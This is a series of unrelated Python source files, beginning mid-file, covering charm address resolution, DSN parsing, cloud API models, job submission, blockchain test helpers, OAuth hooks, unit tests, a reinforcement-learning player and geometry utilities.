        'config': 'os-admin-network',
        'fallback': 'private-address'
    }
}


def canonical_url(configs, endpoint_type=PUBLIC):
    '''
    Returns the correct HTTP URL to this host given the state of HTTPS
    configuration, hacluster and charm configuration.

    :configs OSTemplateRenderer: A config tempating object to inspect for
        a complete https context.
    :endpoint_type str: The endpoint type to resolve.

    :returns str: Base URL for services on the current service unit.
    '''
    scheme = 'http'
    if 'https' in configs.complete_contexts():
        scheme = 'https'
    address = resolve_address(endpoint_type)
    if is_ipv6(address):
        address = "[{}]".format(address)
    return '%s://%s' % (scheme, address)


def resolve_address(endpoint_type=PUBLIC):
    resolved_address = None
    if is_clustered():
        if config(_address_map[endpoint_type]['config']) is None:
            # Assume vip is simple and pass back directly
            resolved_address = config('vip')
        else:
            for vip in config('vip').split():
                if is_address_in_network(
                        config(_address_map[endpoint_type]['config']),
                        vip):
                    resolved_address = vip
    else:
        if config('prefer-ipv6'):
            fallback_addr = get_ipv6_addr()
        else:
            fallback_addr = unit_get(_address_map[endpoint_type]['fallback'])
        resolved_address = get_address_in_network(
            config(_address_map[endpoint_type]['config']), fallback_addr)

    if resolved_address is None:
        raise ValueError('Unable to resolve a suitable IP address'
                         ' based on charm state and configuration')
    else:
        return resolved_address

import collections
import re
import urlparse


class DSN(collections.MutableMapping):
    ''' Hold the results of a parsed dsn.
    This is very similar to urlparse.ParseResult tuple.

    http://docs.python.org/2/library/urlparse.html#results-of-urlparse-and-urlsplit

    It exposes the following attributes:

        scheme
        schemes -- if your scheme has +'s in it, then this will contain a list of schemes split by +
        path
        paths -- the path segment split by /, so "/foo/bar" would be ["foo", "bar"]
        host -- same as hostname (I just like host better)
        hostname
        hostloc -- host:port
        username
        password
        netloc
        query -- a dict of the query string
        query_str -- the raw query string
        port
        fragment
    '''
    DSN_REGEXP = re.compile(r'^\S+://\S+')
    FIELDS = ('scheme', 'netloc', 'path', 'params', 'query', 'fragment')

    def __init__(self, dsn, **defaults):
        ''' Parse a dsn to parts similar to urlparse.
        This is a nuts function that can serve as a good basis to parsing a custom dsn

        :param dsn: the dsn to parse
        :type dsn: str
        :param defaults: any values you want to have defaults for if they aren't in the dsn
        :type defaults: dict
        '''

        assert self.DSN_REGEXP.match(dsn), \
            "{} is invalid, only full dsn urls (scheme://host...) allowed".format(dsn)

        first_colon = dsn.find(':')
        scheme = dsn[0:first_colon]
        dsn_url = dsn[first_colon+1:]
        url = urlparse.urlparse(dsn_url)

        options = {}
        if url.query:
            for k, kv in urlparse.parse_qs(url.query, True, True).iteritems():
                if len(kv) > 1:
                    options[k] = kv
                else:
                    options[k] = kv[0]

        self.scheme = scheme
        self.hostname = url.hostname
        self.path = url.path
        self.params = url.params
        self.query = options
        self.fragment = url.fragment
        self.username = url.username
        self.password = url.password
        self.port = url.port
        self.query_str = url.query

        for k, v in defaults.iteritems():
            self.set_default(k, v)

    def __iter__(self):
        for f in self.FIELDS:
            yield getattr(self, f, '')

    def __len__(self):
        return len(iter(self))

    def __getitem__(self, field):
        return getattr(self, field, None)

    def __setitem__(self, field, value):
        setattr(self, field, value)

    def __delitem__(self, field):
        delattr(self, field)

    @property
    def schemes(self):
        '''the scheme, split by plus signs'''
        return self.scheme.split('+')

    @property
    def netloc(self):
        '''return username:password@hostname:port'''
        s = ''
        prefix = ''
        if self.username:
            s += self.username
            prefix = '@'

        if self.password:
            s += ":{}".format(self.password)
            prefix = '@'

        s += "{}{}".format(prefix, self.hostloc)
        return s

    @property
    def paths(self):
        '''the path attribute split by /'''
        return filter(None, self.path.split('/'))

    @property
    def host(self):
        '''the hostname, but I like host better'''
        return self.hostname

    @property
    def hostloc(self):
        '''return host:port'''
        hostloc = self.hostname
        if self.port:
            hostloc = '{}:{}'.format(hostloc, self.port)

        return hostloc

    def set_default(self, key, value):
        ''' Set a default value for key.

        This is different than dict's setdefault because it will set default either
        if the key doesn't exist, or if the value at the key evaluates to False, so
        an empty string or a None will value will be updated.

        :param key: the item to update
        :type key: str
        :param value: the items new value if key has a current value that evaluates to False
        '''
        if not getattr(self, key, None):
            setattr(self, key, value)

    def get_url(self):
        '''return the dsn back into url form'''
        return urlparse.urlunparse((
            self.scheme,
            self.netloc,
            self.path,
            self.params,
            self.query_str,
            self.fragment,
        ))

    def copy(self):
        return DSN(self.get_url())

    def __str__(self):
        return self.get_url()

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 24 12:49:36 2017

@author: drsmith
"""

import os
from .globals import FdpError


def canonicalMachineName(machine=''):
    aliases = {'nstxu': ['nstx', 'nstxu', 'nstx-u'],
               'diiid': ['diiid', 'diii-d', 'd3d'],
               'cmod': ['cmod', 'c-mod']}
    for key, value in aliases.items():
        if machine.lower() in value:
            return key
    # invalid machine name
    raise FdpError('"{}" is not a valid machine name\n'.format(machine))


MDS_SERVERS = {
    'nstxu': {'hostname': 'skylark.pppl.gov',
              'port': '8000'},
    'diiid': {'hostname': 'atlas.gat.com',
              'port': '8000'}
}

EVENT_SERVERS = {
    'nstxu': {'hostname': 'skylark.pppl.gov',
              'port': '8000'},
    'diiid': {'hostname': 'atlas.gat.com',
              'port': '8000'},
    'ltx': {'hostname': 'lithos.pppl.gov',
            'port': '8000'}
}

LOGBOOK_CREDENTIALS = {
    'nstxu': {'server': 'sql2008.pppl.gov',
              'instance': None,
              'username': None,
              'password': None,
              'database': None,
              'port': '62917',
              'table': 'entries',
              'loginfile': os.path.join(os.getenv('HOME'),
                                        'nstxlogs.sybase_login')
              }
}

# -*- coding:utf-8 -*-

# This code is automatically transpiled by Saklient Translator

import six
from ..client import Client
from .model import Model
from ..resources.resource import Resource
from ..resources.licenseinfo import LicenseInfo
from ...util import Util
import saklient

str = six.text_type
# module saklient.cloud.models.model_licenseinfo

class Model_LicenseInfo(Model):
    ## ライセンス種別情報を検索するための機能を備えたクラス。
    
    ## @private
    # @return {str}
    def _api_path(self):
        return "/product/license"
    
    ## @private
    # @return {str}
    def _root_key(self):
        return "LicenseInfo"
    
    ## @private
    # @return {str}
    def _root_key_m(self):
        return "LicenseInfo"
    
    ## @private
    # @return {str}
    def _class_name(self):
        return "LicenseInfo"
    
    ## @private
    # @param {any} obj
    # @param {bool} wrapped=False
    # @return {saklient.cloud.resources.resource.Resource}
    def _create_resource_impl(self, obj, wrapped=False):
        Util.validate_type(wrapped, "bool")
        return LicenseInfo(self._client, obj, wrapped)
    
    ## 次に取得するリストの開始オフセットを指定します。
    # 
    # @param {int} offset オフセット
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
    def offset(self, offset):
        Util.validate_type(offset, "int")
        return self._offset(offset)
    
    ## 次に取得するリストの上限レコード数を指定します。
    # 
    # @param {int} count 上限レコード数
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
    def limit(self, count):
        Util.validate_type(count, "int")
        return self._limit(count)
    
    ## Web APIのフィルタリング設定を直接指定します。
    # 
    # @param {str} key キー
    # @param {any} value 値
    # @param {bool} multiple=False valueに配列を与え、OR条件で完全一致検索する場合にtrueを指定します。通常、valueはスカラ値であいまい検索されます。
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
    def filter_by(self, key, value, multiple=False):
        Util.validate_type(key, "str")
        Util.validate_type(multiple, "bool")
        return self._filter_by(key, value, multiple)
    
    ## 次のリクエストのために設定されているステートをすべて破棄します。
    # 
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
    def reset(self):
        return self._reset()
    
    ## 指定したIDを持つ唯一のリソースを取得します。
    # 
    # @param {str} id
    # @return {saklient.cloud.resources.licenseinfo.LicenseInfo} リソースオブジェクト
    def get_by_id(self, id):
        Util.validate_type(id, "str")
        return self._get_by_id(id)
    
    ## リソースの検索リクエストを実行し、結果をリストで取得します。
    # 
    # @return {saklient.cloud.resources.licenseinfo.LicenseInfo[]} リソースオブジェクトの配列
    def find(self):
        return self._find()
    
    ## 指定した文字列を名前に含むリソースに絞り込みます。
    # 
    # 大文字・小文字は区別されません。
    # 半角スペースで区切られた複数の文字列は、それらをすべて含むことが条件とみなされます。
    # 
    # @todo Implement test case
    # @param {str} name
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
    def with_name_like(self, name):
        Util.validate_type(name, "str")
        return self._with_name_like(name)
    
    ## 名前でソートします。
    # 
    # @todo Implement test case
    # @param {bool} reverse=False
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
    def sort_by_name(self, reverse=False):
        Util.validate_type(reverse, "bool")
        return self._sort_by_name(reverse)
    
    ## @ignore
    # @param {saklient.cloud.client.Client} client
    def __init__(self, client):
        super(Model_LicenseInfo, self).__init__(client)
        Util.validate_type(client, "saklient.cloud.client.Client")
    

import os
import logging

from jsub.util import safe_mkdir
from jsub.util import safe_rmdir

class Submit(object):
	def __init__(self, manager, task_id, sub_ids=None, dry_run=False, resubmit=False):
		self.__manager = manager
		self.__task	= self.__manager.load_task(task_id)
		self.__sub_ids = sub_ids
		self.__dry_run = dry_run
		self.__resubmit = resubmit

		self.__logger = logging.getLogger('JSUB')
		if self.__sub_ids==None:
			self.__sub_ids=range(len(self.__task.data['jobvar']))

		self.__initialize_manager()

	def __initialize_manager(self):
		self.__config_mgr	= self.__manager.load_config_manager()

		self.__backend_mgr   = self.__manager.load_backend_manager()
		self.__bootstrap_mgr = self.__manager.load_bootstrap_manager()
		self.__navigator_mgr = self.__manager.load_navigator_manager()
		self.__context_mgr  = self.__manager.load_context_manager()
		self.__action_mgr	= self.__manager.load_action_manager()
		self.__launcher_mgr  = self.__manager.load_launcher_manager()


	def handle(self):
		run_root = self.__backend_mgr.get_run_root(self.__task.data['backend'], self.__task.data['id'])

		main_root = os.path.join(run_root, 'main')

		safe_rmdir(main_root)
		safe_mkdir(main_root)

		self.__create_input(main_root)
		self.__create_context(main_root)
		self.__create_action(main_root)
		self.__create_navigator(main_root)
		self.__create_bootstrap(main_root)

		launcher_param = self.__create_launcher(run_root)

		self.__submit(launcher_param)


	def __create_input(self, main_root):
		content = self.__manager.load_content()
		input_dir = os.path.join(main_root,'input')
		try:
			content.get(self.__task.data['id'], 'input', os.path.join(main_root, 'input'))
		except:
			safe_mkdir(input_dir)

	def __create_context(self, main_root):
		context_dir = os.path.join(main_root, 'context')
		safe_mkdir(context_dir)

		action_default = {}
		for unit, param in self.__task.data['workflow'].items():
			action_default[unit] = self.__action_mgr.default_config(param['type'])

		navigators = self.__config_mgr.navigator()
		context_format = self.__navigator_mgr.context_format(navigators)

		self.__context_mgr.create_context_file(self.__task.data, action_default, context_format, context_dir)

	def __create_action(self, main_root):
		action_dir = os.path.join(main_root, 'action')
		safe_mkdir(action_dir)

		actions = set()
		for unit, param in self.__task.data['workflow'].items():
			actions.add(param['type'])
		self.__action_mgr.create_actions(actions, action_dir)

	def __create_navigator(self, main_root):
		navigator_dir = os.path.join(main_root, 'navigator')
		safe_mkdir(navigator_dir)

		navigators = self.__config_mgr.navigator()
		self.__navigator_mgr.create_navigators(navigators, navigator_dir)

	def __create_bootstrap(self, main_root):
		bootstrap_dir = os.path.join(main_root, 'bootstrap')
		safe_mkdir(bootstrap_dir)

		bootstrap = self.__config_mgr.bootstrap()
		self.__bootstrap_mgr.create_bootstrap(bootstrap, bootstrap_dir)

	def __create_launcher(self, run_root):
		launcher = self.__task.data['backend']['launcher']
		return self.__launcher_mgr.create_launcher(launcher, run_root)


	def __submit(self, launcher_param):
		if self.__dry_run:
			return

		if self.__resubmit==False:
			if self.__task.data.get('backend_job_ids') or self.__task.data.get('backend_task_id'):
				self.__logger.info('This task has already been submitted to backend, rerun the command with "-r" option if you wish to delete current jobs and resubmit the task.') 
				return
		else:	
			self.__logger.info('Removing submitted jobs on backend before resubmission.') 
			task_id = self.__task.data.get('backend_task_id')
			#remove previously generated files in job folder
			job_ids = self.__task.data.get('backend_job_ids')
			run_root = self.__backend_mgr.get_run_root(self.__task.data['backend'], self.__task.data['id'])
			job_root=os.path.join(run_root,'subjobs')
			safe_rmdir(job_root)
			if task_id:
				self.__backend_mgr.delete_task(self.__task.data['backend'],backend_task_id = task_id)
			elif job_ids:
				self.__backend_mgr.delete_jobs(self.__task.data['backend'],backend_job_ids = job_ids)

		result = self.__backend_mgr.submit(self.__task.data['backend'], self.__task.data['id'], launcher_param, sub_ids = self.__sub_ids)
		if not type(result) is  dict:
			result = {}

		if 'backend_job_ids' in result:
			njobs = len(result['backend_job_ids'])
		else:
			njobs = len(result)
		if njobs>0:
			self.__logger.info('%d jobs successfully submitted to backend.'%(njobs))

		self.__task.data.setdefault('backend_job_ids',{})
		backend_job_ids=result.get('backend_job_ids',{})
		backend_task_id=result.get('backend_task_id',0)
		self.__task.data['backend_job_ids'].update(backend_job_ids) 
		self.__task.data['backend_task_id']=backend_task_id
		self.__task.data['status'] = 'Submitted'
		task_pool = self.__manager.load_task_pool()
		task_pool.save(self.__task)

		self.__logger.debug(result)


import os
from typing import List, Tuple

from raiden.network.blockchain_service import BlockChainService
from raiden.network.pathfinding import get_random_service
from raiden.network.proxies.service_registry import ServiceRegistry
from raiden.network.rpc.client import JSONRPCClient
from raiden.network.rpc.smartcontract_proxy import ContractProxy
from raiden.utils import typing
from raiden.utils.smart_contracts import deploy_contract_web3
from raiden.utils.solc import compile_files_cwd
from raiden_contracts.constants import CONTRACT_HUMAN_STANDARD_TOKEN
from raiden_contracts.contract_manager import ContractManager


def deploy_token(
    deploy_client: JSONRPCClient,
    contract_manager: ContractManager,
    initial_amount: typing.TokenAmount,
    decimals: int,
    token_name: str,
    token_symbol: str,
) -> ContractProxy:
    token_address = deploy_contract_web3(
        contract_name=CONTRACT_HUMAN_STANDARD_TOKEN,
        deploy_client=deploy_client,
        contract_manager=contract_manager,
        constructor_arguments=(initial_amount, decimals, token_name, token_symbol),
    )

    contract_abi = contract_manager.get_contract_abi(CONTRACT_HUMAN_STANDARD_TOKEN)
    return deploy_client.new_contract_proxy(
        contract_interface=contract_abi, contract_address=token_address
    )


def deploy_tokens_and_fund_accounts(
    token_amount: int,
    number_of_tokens: int,
    deploy_service: BlockChainService,
    participants: typing.List[typing.Address],
    contract_manager: ContractManager,
) -> typing.List[typing.TokenAddress]:
    """ Deploy `number_of_tokens` ERC20 token instances with `token_amount` minted and
    distributed among `blockchain_services`. Optionally the instances will be registered with
    the raiden registry.

    Args:
        token_amount (int): number of units that will be created per token
        number_of_tokens (int): number of token instances that will be created
        deploy_service (BlockChainService): the blockchain connection that will deploy
        participants (list(address)): participant addresses that will receive tokens
    """
    result = list()
    for _ in range(number_of_tokens):
        token_address = deploy_contract_web3(
            CONTRACT_HUMAN_STANDARD_TOKEN,
            deploy_service.client,
            contract_manager=contract_manager,
            constructor_arguments=(token_amount, 2, "raiden", "Rd"),
        )

        result.append(token_address)

        # only the creator of the token starts with a balance (deploy_service),
        # transfer from the creator to the other nodes
        for transfer_to in participants:
            deploy_service.token(token_address).transfer(
                to_address=transfer_to, amount=token_amount // len(participants)
            )

    return result


def deploy_service_registry_and_set_urls(
    private_keys, web3, contract_manager, service_registry_address
) -> Tuple[ServiceRegistry, List[str]]:
    urls = ["http://foo", "http://boo", "http://coo"]
    c1_client = JSONRPCClient(web3, private_keys[0])
    c1_service_proxy = ServiceRegistry(
        jsonrpc_client=c1_client,
        service_registry_address=service_registry_address,
        contract_manager=contract_manager,
    )
    c2_client = JSONRPCClient(web3, private_keys[1])
    c2_service_proxy = ServiceRegistry(
        jsonrpc_client=c2_client,
        service_registry_address=service_registry_address,
        contract_manager=contract_manager,
    )
    c3_client = JSONRPCClient(web3, private_keys[2])
    c3_service_proxy = ServiceRegistry(
        jsonrpc_client=c3_client,
        service_registry_address=service_registry_address,
        contract_manager=contract_manager,
    )

    # Test that getting a random service for an empty registry returns None
    pfs_address = get_random_service(c1_service_proxy, "latest")
    assert pfs_address is None

    # Test that setting the urls works
    c1_service_proxy.set_url(urls[0])
    c2_service_proxy.set_url(urls[1])
    c3_service_proxy.set_url(urls[2])

    return c1_service_proxy, urls


def get_test_contract(name):
    contract_path = os.path.abspath(
        os.path.join(os.path.dirname(__file__), "..", "smart_contracts", name)
    )
    contracts = compile_files_cwd([contract_path])

    return contract_path, contracts


def deploy_rpc_test_contract(deploy_client, name):
    contract_path, contracts = get_test_contract(f"{name}.sol")
    contract_proxy, _ = deploy_client.deploy_solidity_contract(
        name, contracts, libraries=dict(), constructor_parameters=None, contract_path=contract_path
    )

    return contract_proxy


def get_list_of_block_numbers(item):
    """ Creates a list of block numbers of the given list/single event"""
    if isinstance(item, list):
        return [element["blockNumber"] for element in item]

    if isinstance(item, dict):
        block_number = item["blockNumber"]
        return [block_number]

    return list()

# This file is part of Indico.
# Copyright (C) 2002 - 2022 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.

import os

from indico.core import signals
from indico.core.db import db

from .logger import logger
from .oauth2 import require_oauth


__all__ = ['require_oauth']


@signals.core.app_created.connect
def _no_ssl_required_on_debug(app, **kwargs):
    if app.debug or app.testing:
        os.environ['AUTHLIB_INSECURE_TRANSPORT'] = '1'


@signals.users.merged.connect
def _delete_merged_user_tokens(target, source, **kwargs):
    target_app_links = {link.application: link for link in target.oauth_app_links}
    for source_link in source.oauth_app_links.all():
        try:
            target_link = target_app_links[source_link.application]
        except KeyError:
            logger.info('merge: reassigning %r to %r', source_link, target)
            source_link.user = target
        else:
            logger.info('merge: merging %r into %r', source_link, target_link)
            target_link.update_scopes(set(source_link.scopes))
            target_link.tokens.extend(source_link.tokens)
            db.session.delete(source_link)

import random
# Definition for singly-linked list.
# class ListNode(object):
#     def __init__(self, x):
#         self.val = x
#         self.next = None


class Solution(object):
    _largesize = 300

    def __init__(self, head):
        self.head = head
        self.lsize = 0
        while head.next:
            head = head.next
            self.lsize += 1

        self.m1_idx = None
        self.m2_idx = None
        if self.lsize > self._largesize:
            self.m1_idx = self.lsize / 3   # start from 1/3
            self.m1 = self._getN(self.m1_idx)
            self.m2_idx = self.m1_idx * 2  # start from 2/3
            self.m2 = self._getN(self.m2_idx)

    def _getN(self, n):
        n -= 1
        p = self.head
        while n:
            p = p.next
            n -= 1
        return p

    def getRandom(self):
        def _get(delta, start):
            p = start
            while delta:
                p = p.next
                delta -= 1
            return p.val

        nextpos = random.randint(0, self.lsize)
        if not self.m1_idx:
            return _get(nextpos, self.head)

        if nextpos < self.m1_idx:
            val = _get(nextpos, self.head)
        elif nextpos < self.m2_idx:
            val = _get(nextpos - self.m1_idx, self.m1)
        else:
            val = _get(nextpos - self.m2_idx, self.m2)
        return val

#!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import os
from misura.canon import option
from misura.canon.option import get_typed_cols, get_insert_cmd, base_col_def, print_tree
import sqlite3
from misura.canon.tests import testdir

db = testdir + 'storage/tmpdb'
c1 = testdir + 'storage/Conf.csv'


def go(t):
    o = option.Option(**{'handle': t, 'type': t})
    o.validate()
    return o


class SqlStore(unittest.TestCase):

    @classmethod
    def setUpClass(cls):
        if os.path.exists(db):
            os.remove(db)
        cls.conn = sqlite3.connect(db, detect_types=sqlite3.PARSE_DECLTYPES)
        st0 = option.CsvStore(kid='/base/')
        st0.merge_file(c1)
        st0.validate()
        cls.desc = st0.desc

    def test_get_typed_cols(self):
        print(get_typed_cols(go('Integer')))
        print(get_typed_cols(go('String')))
        print(get_typed_cols(go('Point')))
        print(get_typed_cols(go('Role')))
        print(get_typed_cols(go('RoleIO')))
        print(get_typed_cols(go('Log')))
        print(get_typed_cols(go('Meta')))

    def test_get_insert_cmd(self):
        print(get_insert_cmd(go('Integer'), base_col_def))
        print(get_insert_cmd(go('String'), base_col_def))
        print(get_insert_cmd(go('Point'), base_col_def))
        print(get_insert_cmd(go('Role'), base_col_def))
        print(get_insert_cmd(go('RoleIO'), base_col_def))
        print(get_insert_cmd(go('Log'), base_col_def))
        print(get_insert_cmd(go('Meta'), base_col_def))

    def test_column_definition(self):
        s = option.SqlStore()
        print(s.column_definition(go('Integer'))[1])
        print(s.column_definition(go('String'))[1])
        print(s.column_definition(go('Point'))[1])
        print(s.column_definition(go('Role'))[1])
        print(s.column_definition(go('RoleIO'))[1])
        print(s.column_definition(go('Log'))[1])
        print(s.column_definition(go('Meta'))[1])

    def test_write_desc(self):
        s = option.SqlStore()
        s.cursor = self.conn.cursor()
        s.write_desc(self.desc)
        print('READING')
        r = s.read_tree()
        print(r)
        print('print(tree\n', print_tree(r))
        print('WRITING AGAIN')
        s.write_tree(r)
        print("READING AGAIN")
        r = s.read_tree()
        print(r)
        print('print(tree2\n', print_tree(r))


#	@unittest.skip('')
    def test_tables(self):
        st0 = option.CsvStore(kid='ciao')
        st0.merge_file(c1)
        st = option.SqlStore(kid='ciao')
        st.desc = st0.desc
        k0 = set(st.desc.keys())
        cursor = self.conn.cursor()
        st.write_table(cursor, 'conf1')
        self.conn.commit()
        cursor.execute('select handle from conf1')
        r = cursor.fetchall()
        k1 = set([eval(k[0]) for k in r])
        self.assertEqual(k0, k1)

        st2 = option.SqlStore(kid='ciao')
        st2.read_table(cursor, 'conf1')
        self.assertEqual(st.desc, st2.desc)


if __name__ == "__main__":
    unittest.main()

from players.player import player
from auxiliar.aux_plot import *

import random
from collections import deque

import sys
sys.path.append('..')
import tensorblock as tb
import numpy as np

import tensorflow as tf


# PLAYER REINFORCE RNN
class player_reinforce_rnn_2(player):

    # __INIT__
    def __init__(self):

        player.__init__(self)
        self.experiences = deque()

    # CHOOSE NEXT ACTION
    def act(self, state):

        return self.calculate(state)

    # CALCULATE NETWORK
    def calculate(self, state):

        size = len( self.experiences )

        if size < self.NUM_FRAMES:
            return self.create_random_action()

        states = np.zeros( (self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )

        for i , j in enumerate( range( size - self.NUM_FRAMES , size  ) ):
            states[i] = self.experiences[j][1]

        states = np.expand_dims( states, 0 )
        output = np.squeeze( self.brain.run('Output', [['Observation', states]]) )
        action = np.random.choice( np.arange(len(output)), p=output )

        return self.create_action(action)

    # PREPARE NETWORK
    def operations(self):

        # Action Placeholders

        self.brain.addInput( shape = [ None , self.num_actions ] , name = 'Actions' )
        self.brain.addInput( shape = [ None                    ] , name = 'Target'  )


        # Operations

        self.brain.addOperation( function = tb.ops.pgcost,
                                 input    = [ 'Output', 'Actions', 'Target' ],
                                 name     = 'Cost' )

        # Optimizer

        self.brain.addOperation( function      = tb.optims.adam,
                                 input         = 'Cost',
                                 learning_rate = self.LEARNING_RATE,
                                 name          = 'Optimizer' )

        # TensorBoard

        self.brain.addSummaryScalar( input = 'Cost' )
        self.brain.addSummaryHistogram( input = 'Target' )
        self.brain.addWriter( name = 'Writer' , dir = './' )
        self.brain.addSummary( name = 'Summary' )
        self.brain.initialize()

    # TRAIN NETWORK
    def train(self, prev_state, curr_state, actn, rewd, done, episode):

        # Store New Experience Until Done

        self.experiences.append((prev_state, curr_state, actn, rewd, done))

        batchsize = len( self.experiences ) - self.NUM_FRAMES + 1

        # Check for Train

        if done:

            # Select Batch

            batch = self.experiences

            # Separate Batch Data

            prev_states = np.zeros( ( batchsize , self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )
            curr_states = np.zeros( ( batchsize , self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )
            actions     = np.zeros( ( batchsize , self.num_actions ) )
            rewards     = np.zeros( ( batchsize ) )
            dones       = np.zeros( ( batchsize ) )

            # Select Batches

            for i in range( 0 , batchsize ):

                for j in range( 0 , self.NUM_FRAMES ):

                    prev_states[i,j,:,:] = self.experiences[ i + j ][0]
                    curr_states[i,j,:,:] = self.experiences[ i + j ][1]

                actions[i] = self.experiences[ i + self.NUM_FRAMES  - 1][2]
                rewards[i] = self.experiences[ i + self.NUM_FRAMES  - 1][3]
                dones[i]   = self.experiences[ i + self.NUM_FRAMES  - 1][4]

            # Calculate Discounted Reward

            running_add = 0
            discounted_r = np.zeros_like(rewards)
            for t in reversed(range(0, len(rewards))):
                if rewards[t] != 0:  # pygame_catch specific
                    running_add = 0
                running_add = running_add * self.REWARD_DISCOUNT + rewards[t]
                discounted_r[t] = running_add

            # Optimize Neural Network

            _, summary = self.brain.run( ['Optimizer','Summary'], [ ['Observation', prev_states ],
                                                                    ['Actions',  actions        ],
                                                                    ['Target', discounted_r     ] ] )

            # TensorBoard

            self.brain.write( summary = summary, iter = episode )

            # Reset Batch

            self.experiences = deque()

from SBaaS_base.postgresql_orm_base import *

class data_stage01_rnasequencing_analysis(Base):
    __tablename__ = 'data_stage01_rnasequencing_analysis'
    id = Column(Integer, Sequence('data_stage01_rnasequencing_analysis_id_seq'), primary_key=True)
    analysis_id = Column(String(500))
    experiment_id = Column(String(50))
    sample_name_abbreviation = Column(String(500)) # equivalent to sample_name_abbreviation
    sample_name = Column(String(500)) # equivalent to sample_name_abbreviation
    time_point = Column(String(10)) # converted to intermediate in lineage analysis
    analysis_type = Column(String(100)); # time-course (i.e., multiple time points), paired (i.e., control compared to multiple replicates), group (i.e., single grouping of samples).
    used_ = Column(Boolean);
    comment_ = Column(Text);

    __table_args__ = (
            UniqueConstraint('experiment_id','sample_name_abbreviation','sample_name','time_point','analysis_type','analysis_id'),
            )
    def __init__(self, 
                row_dict_I,
                ):
        self.analysis_id=row_dict_I['analysis_id'];
        self.experiment_id=row_dict_I['experiment_id'];
        self.sample_name_abbreviation=row_dict_I['sample_name_abbreviation'];
        self.sample_name=row_dict_I['sample_name'];
        self.time_point=row_dict_I['time_point'];
        self.analysis_type=row_dict_I['analysis_type'];
        self.used_=row_dict_I['used_'];
        self.comment_=row_dict_I['comment_'];

    def __set__row__(self,analysis_id_I,
                 experiment_id_I,
            sample_name_abbreviation_I,
            sample_name_I,
            time_point_I,
            analysis_type_I,
            used__I,
            comment__I):
        self.analysis_id=analysis_id_I
        self.experiment_id=experiment_id_I
        self.sample_name_abbreviation=sample_name_abbreviation_I
        self.sample_name=sample_name_I
        self.time_point=time_point_I
        self.analysis_type=analysis_type_I
        self.used_=used__I
        self.comment_=comment__I

    def __repr__dict__(self):
        return {'id':self.id,
                'analysis_id':self.analysis_id,
            'experiment_id':self.experiment_id,
            'sample_name_abbreviation':self.sample_name_abbreviation,
            'sample_name':self.sample_name,
            'time_point':self.time_point,
            'analysis_type':self.analysis_type,
            'used_':self.used_,
            'comment_':self.comment_}
    
    def __repr__json__(self):
        return json.dumps(self.__repr__dict__())
#!/usr/bin/python
# -*- coding: utf-8 -*-
# pylint: disable=invalid-name
from __future__ import absolute_import
from math import acos, cos, pi, radians, sin, sqrt
import auttitude as at
import numpy as np


def normalized_cross(a, b):
    """
    Returns the normalized cross product between vectors.
    Uses numpy.cross().
    
    Parameters:
        a: First vector.
        b: Second vector.
    """
    c = np.cross(a, b)
    length = sqrt(c.dot(c))
    return c/length if length > 0 else c


def general_plane_intersection(n_a, da, n_b, db):
    """
    Returns a point and direction vector for the line of intersection
    of two planes in space, or None if planes are parallel.
    
    Parameters:
        n_a: Normal vector to plane A
         da: Point of plane A
        n_b: Normal vector to plane B
         db: Point of plane B
    """
    
    # https://en.wikipedia.org/wiki/Intersection_curve
    
    n_a = np.array(n_a)
    n_b = np.array(n_b)
    da  = np.array(da)
    db  = np.array(db)
    
    l_v = np.cross(n_a, n_b)
    norm_l = sqrt(np.dot(l_v, l_v))
    if norm_l == 0:
        return None
    else:
        l_v /= norm_l
    aa = np.dot(n_a, n_a)
    bb = np.dot(n_b, n_b)
    ab = np.dot(n_a, n_b)
    d_ = 1./(aa*bb - ab*ab)
    l_0 = (da*bb - db*ab)*d_*n_a + (db*aa - da*ab)*d_*n_b
    
    return l_v, l_0


def small_circle_intersection(axis_a, angle_a, axis_b, angle_b):
    """
    Finds the intersection between two small-circles returning zero, one or two 
    solutions as tuple.  
    
    Parameters:
         axis_a: Vector defining first circle axis
        angle_a: Small circle aperture angle (in radians) around axis_a 
         axis_b: Vector defining second circle axis
        angle_b: Small circle aperture angle (in radians) around axis_b
    """
    line = general_plane_intersection(axis_a, cos(angle_a),
                                      axis_b, cos(angle_b))
    if line is None:
        return ()
    l_v, l_0 = line
    # https://en.wikipedia.org/wiki/Line%E2%80%93sphere_intersection
    b = 2*l_v.dot(l_0)
    delta = b*b - 4*(l_0.dot(l_0) - 1)
    # Should the answers be normalized?
    if delta < 0:
        return ()
    elif delta == 0:
        return -b/2.,
    else:
        sqrt_delta = sqrt(delta)
        return l_0 + l_v*(-b - sqrt_delta)/2., l_0 + l_v*(-b + sqrt_delta)/2.


def build_rotation_matrix(azim, plng, rake):
    """
    Returns the rotation matrix that rotates the North vector to the line given 
    by Azimuth and Plunge and East and Up vectors are rotate clock-wise by Rake
    around the rotated North vector. 
    
    Parameters:
        azim: Line Azimuth from North (degrees).
        plng: Line Plunge measured from horizontal (degrees).
        rake: Rotation angle around rotated axis (degrees).
    """
    # pylint: disable=bad-whitespace
    azim, plng, rake = radians(azim), radians(plng), radians(rake)

    R1 = np.array((( cos(rake), 0.,        sin(rake)),
                   ( 0.,        1.,         0.      ),
                   (-sin(rake), 0.,        cos(rake))))

    R2 = np.array((( 1.,        0.,        0.       ),
                   ( 0.,        cos(plng), sin(plng)),
                   ( 0.,       -sin(plng), cos(plng))))

    R3 = np.array((( cos(azim), sin(azim), 0.       ),
                   (-sin(azim), cos(azim), 0.       ),
                   ( 0.,        0.,        1.       )))

    return R3.dot(R2).dot(R1)


def adjust_lines_to_planes(lines, planes):
    """
    Project each given line to it's respective plane. Returns the projected
    lines as a new LineSet and the angle (in radians) between each line and
    plane prior to projection.
    
    Parameters: 
        lines:  A LineSet like object with an array of n Lines
        planes: A PlaseSet like object with an array of n Planes 
    """
    
    lines  = at.LineSet(lines)
